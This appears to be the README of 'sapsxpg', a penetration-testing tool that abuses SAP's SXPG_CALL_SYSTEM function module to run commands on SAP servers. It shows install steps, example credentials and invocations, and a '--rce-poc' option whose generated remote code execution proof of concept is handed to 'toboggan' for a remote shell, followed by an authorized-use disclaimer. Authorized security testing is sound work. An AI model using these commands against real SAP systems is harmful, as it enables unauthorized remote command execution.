Simplifying the usage of the SXPG_CALL_SYSTEM FM over a SAP server with logging.
The NWRFCSDK is proprietary SAP software, not open source. It requires an S-User account and specific permissions to download. Since SAP owns the intellectual property, it cannot be published or included inside this repository.
- Visit the SAP Support Portal.
- Download the appropriate version for your operating system.
- Follow the installation guide.
If you already have nwrfcsdk dropped somewhere on your system, you can, in a Linux environment, find-it with:
find /opt /home /usr/local /srv -type d -path "*/nwrfcsdk" -print -quit 2>/dev/nullIt will give you a path, use this one to export the two mandatory variables:
NWRFCSDK_PATH=$(find /opt /home /usr/local /srv -type d -path "*/nwrfcsdk" -print -quit 2>/dev/null | head -1)
export SAPNWRFC_HOME=$NWRFCSDK_PATH
export LD_LIBRARY_PATH="$NWRFCSDK_PATH/lib:"pipx install 'sapsxpg@git+https://github.com/n3rada/sapsxpg.git'sapsxpg 'aw01585632.aws.sap-noprod.example.com' 'SAPTEST' 'P@ass!w0rd/7'If the underlying system contains a command that allows you to execute commands on the remote system, you can connect it with toboggan. First of all, generate the Remote Commande Execution proof of concept (PoC) with:
sapsxpg 'aw01585632.aws.sap-noprod.example.com' 'SAPTEST' 'P@ass!w0rd/7' --rce-poc "ZSH"It will generate a file named poc_aw01585632.aws.sap-noprod.example.com_ZSH.py. Plug-it with toboggan:
toboggan -m poc_aw01585632.aws.sap-noprod.example.com_ZSH.pyThis tool is intended for use in legal penetration testing, Capture The Flag (CTF) competitions, or other authorized and ethical security assessments.
Unauthorized use of this tool on systems you do not own or without proper authorization may be illegal. Please use-it responsibly and in compliance with applicable laws and regulations.